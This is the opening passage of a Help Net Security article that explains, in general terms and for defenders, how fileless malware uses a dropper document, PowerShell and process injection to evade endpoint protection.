A closer look at fileless malware, beyond the network - Help Net Security

A closer look at fileless malware, beyond the network - Help Net Security

Cybersecurity is an arms race, with defensive tools and training pushing threat actors to adopt even more sophisticated and evasive intrusion techniques as they attempt to gain a foothold in victim networks. Most modern endpoint protection (EPP) services are capable of easily identifying traditional malware payloads as they are downloaded and saved on the endpoint, which means attackers have now turned to fileless malware techniques that never touch the victim’s storage.



We’ve covered the anatomy of an endpoint attack in detail before, so let’s dig into fileless malware specifically and examine a real-world endpoint infection to illustrate key defense best practices you need to have in place today.


Understanding fileless malware’s M.O.


Fileless malware is a bit of a misnomer, as it can – and often does – start with a file. While traditional malware contains the bulk of its malicious code within an executable file saved to the victim’s storage drive, fileless malware’s malicious actions reside solely in memory.


When it comes to traditional malware, deleting the executable means you delete the infection. This makes it easy for EPP solutions to quickly identify and clean up. Fileless malware, on the other hand, only uses the initial “dropper” file (usually an Office document or something similar) to open up a built-in system management tool like PowerShell and run a short script. It then hides from defensive tools by injecting its malicious code into other processes, all the while never touching the victim’s storage drive.


Part of the reason fileless malware has become such a popular attack technique is that it is exceedingly difficult to accurately identify and block the ..